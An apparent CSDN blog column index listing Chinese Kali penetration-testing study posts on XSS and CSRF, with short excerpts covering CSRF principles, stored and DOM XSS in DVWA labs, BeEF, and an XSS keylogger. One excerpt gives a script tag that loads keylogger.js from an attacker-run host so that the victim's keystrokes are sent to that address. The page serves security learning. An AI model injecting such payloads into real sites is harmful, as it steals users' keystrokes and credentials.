![](https://img-blog.csdnimg.cn/20210123120324141.jpg?x-oss-process=image/resize,m_fixed,h_224,w_224)
xss和csrf
文章平均质量分 73
xss
唐吉可黄
这个作者很懒,什么都没留下…
展开
-
xss-pikachu实验的总结
详见https://www.cnblogs.com/dogecheng/p/11556221.html原创 2021-01-23 14:00:00 · 269 阅读 · 0 评论 -
kali渗透学习-Web渗透CSRF
CSRF原理:经常与XSS混淆从信任的角度进行区分:XSS:利用用户对站点的信任;CSRF:利用站点对已经身份认证的信任(有一定的信任,实施的前提必须是用户登录了)【默认情况:站点不信任客户端】结合社工在身份认证会话过程中实现攻击场景:1、修改账号密码、个人信息(email、收货地址)2、发送伪造的业务请求(网银、购物、投票)3、关注他人社交账号、推送博文4、在用户非自愿、不知情情况下提交请求属于业务逻辑漏洞(所有请求都是正常的请求)造成的原因:对关键操作(支付、提交订单等)缺原创 2021-01-23 11:47:27 · 261 阅读 · 0 评论 -
kali渗透学习-Web渗透XSS(三)存储型XSS、DOM型XSS、神器BEFF
存储型XSS1、可长期存储于服务器端2、每次用户访问都会被执行js脚本,攻击者只需侦听指定端口#攻击利用方法大体等于反射型xss利用##多出现在留言板等位置*推荐使用burpsuitea、观察返回结果,是否原封不动地返回输入数据?是否有其他标签js代码通过留言板存储在服务器中,所以每次点击留言板链接,都会弹出xss弹窗注入后会永久在服务器端,每次访问都会下发该注入。用dvwa测试的时候消除注入需在设置中重置数据库b、测试加载攻击者控制的服务器中的js文件#启动apache2【默原创 2021-01-23 11:47:16 · 242 阅读 · 0 评论 -
kali渗透学习-Web渗透XSS(二)漏洞利用-键盘记录器,xsser
原则上:只要XSS漏洞存在,可以编写任何功能的js脚本反射型漏洞利用键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上服务器:kali 客户端启动apache2服务:service apache2 start语法:<script src="http://192.168.1.127/keylogger.js"></script>keylogger.js 键盘记录器 需要修改里面的接受地址document.onkeypress = function(ev原创 2021-01-23 11:46:24 · 450 阅读 · 0 评论 -
kali渗透学习-Web渗透XSS(一)
XSSxss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户浏览器的控制。漏洞存在于服务器端,攻击对象为WEB客户端。【原理:为了使用户体验更好等因素,有部分代码会在浏览器中执行】【JavaScript详解】:与java语言无关;命名完全出于市场原因,是使用最广的客户端脚本语言使用场景:针对以下几个点位注入直接嵌入html:<scr原创 2021-01-23 11:46:50 · 570 阅读 · 0 评论